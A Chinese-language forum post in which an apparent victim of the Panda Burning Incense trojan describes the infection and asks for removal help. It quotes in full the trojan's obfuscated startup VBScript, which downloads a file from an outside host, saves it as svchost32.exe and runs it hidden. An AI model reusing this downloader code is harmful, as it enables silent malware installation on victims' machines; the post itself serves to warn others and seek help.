今天中病毒,发明者很聪明先把声音静音然后退出瑞星监控系统,还好我发现了.及时查看后发现中了进程里有个alga进程很像alg系统进程,然后找到删除还是有,上网查解决方法发现是中了熊猫烧香木马(这个是我中间插一小段,在我写这个帖子的时候瑞星马上升级到了19.06->19.06.01,佩服佩服,不过没试过效果,更新时间是07.01.15 12时02分)
现在问题是:

1:防火墙系统禁止本地iexplore.exe连接网络的请求，地址为：TCP, 0.0.0.0:1045[RASmin木马] => 本人IP地址[WEB网页]程序名称为：C:\Program Files\Internet Explorer\iexplore.exe   

问题:这个RASmin木马是什么东西.我现在没时间查,请高手帮我帖下它的详细介绍,如果我禁止它的话就不能上网了.


2:我还发现alga木马有一个类似任务计划之类,它利用C:\WINDOWS\system32下的wscript.exe执行文件每次启动的时候会自动从一个网站下载alga.exe文件(具体看这里C:\WINDOWS\system32\wscript.exe  CmdLine="C:\WINDOWS\System32\WScript.exe" "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\CONFIG.VBS"),这个自动下载程序命令如下:

on error resume next:tmpname="svchost32.exe":Set ws=CreateObject("Wscript.Shell"):set F=createobject("Scr"&"iptin"&"g.Fil"&"eSyst"&"emOb"&"ject"):set tmp=F.GetSpecialFolder(0):tmpname=F.BuildPath(tmp,tmpname):sub run:size=F.GetFile(tmpname).size:if size>4096 then:ws.run tmpname,vbhide:end if:end sub:temp=tmp&"\alga.exe":size=F.GetFile(temp).size:if size>4096 then:ws.run temp,vbhide:end if:Wscript.Sleep 600000:sub down:xm="Mic"&"rosoft.XM"&"LHTTP":dl="http://down.ddzu.com/down/css.css":set S=createobject("adodb.stream"):Set x=CreateObject(xm):S.type=1:x.Open "GET", dl, False:x.Send():S.open:S.write x.responseBody:S.savetofile tmpname,2:S.close:end sub:call down:call run:Wscript.Sleep 10000000:call down:call run

从上面可以看出它是从http://down.ddzu.com/down/css.css  这个地方下载的.(大家要小心啊)

问题:C:\WINDOWS\system32下的wscript.exe是病毒还是系统文件.我查了C:\WINDOWS\system32下还有个nwscript.exe文件.这个是病毒还是系统文件.
我记得wscript是一种批次语言/自动执行工具,是一个脚本语言解释器，使用很简单，可以编写成*.vbs文件,就像我上面的一样,可以使用户中病毒,那怎么关闭他那??
好像可以通过它可以提升WEBSHELL权限的.
有高手知道的话详细给我下有关这方面的资料

3:正题.到目前为止,瑞星BBS上好像还没这个木马的解决方法?有高手知道吗?

补充:瑞星专杀工具没用.我试过.还是会有木马的 .